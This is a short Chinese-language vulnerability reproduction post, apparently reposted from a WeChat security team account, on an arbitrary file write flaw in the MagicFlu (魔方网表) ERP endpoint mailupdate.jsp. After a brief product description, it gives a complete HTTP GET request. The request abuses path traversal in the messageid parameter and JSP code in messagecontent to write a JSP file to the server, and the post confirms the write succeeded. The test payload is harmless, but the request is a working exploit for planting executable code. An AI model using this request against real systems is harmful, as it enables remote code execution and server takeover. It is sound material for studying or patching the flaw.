0. 漏洞介绍

魔方网表ERP是一款高效、灵活的企业资源规划解决方案，旨在帮助企业实现数智化转型，消除信息孤岛，打造全程一体化的管理体系。魔方网表ERP拥有强大的表单功能和模块化的产品特点，使得企业可以根据自身业务需求，通过简单的拖拽和配置，快速搭建符合自身特点的复杂业务管理系统。同时，魔方网表ERP能够无缝对接外部系统，打破信息壁垒，实现业务跨部门间并行协作，提高工作效率。

1. 影响对象(影响范围)

1.1 影响软件

魔方网表ERP

2. 漏洞指纹

3. 漏洞复现

3.1 mailupdate.jsp命令执行

   mailupdate.jsp中通过参数messageid控制访问文件的路径，通过messagecontent编辑访问文件的内容，

GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test1.jsp&messagecontent=%3C%25+out.println%28%22tteesstt1%22%29%3B%25%3E HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: /Host: Connection: close

    这里尝试对/magicflu文件夹进行文件写入操作，写入文件为test1.jsp，写入内容为<% out.println("tteesstt1");%>

3.2 查看结果

访问相应文件，发现文件写入成功

原文始发于微信公众号（蟹堡安全团队）：魔方网表 mailupdate.jsp 接口 任意文件上传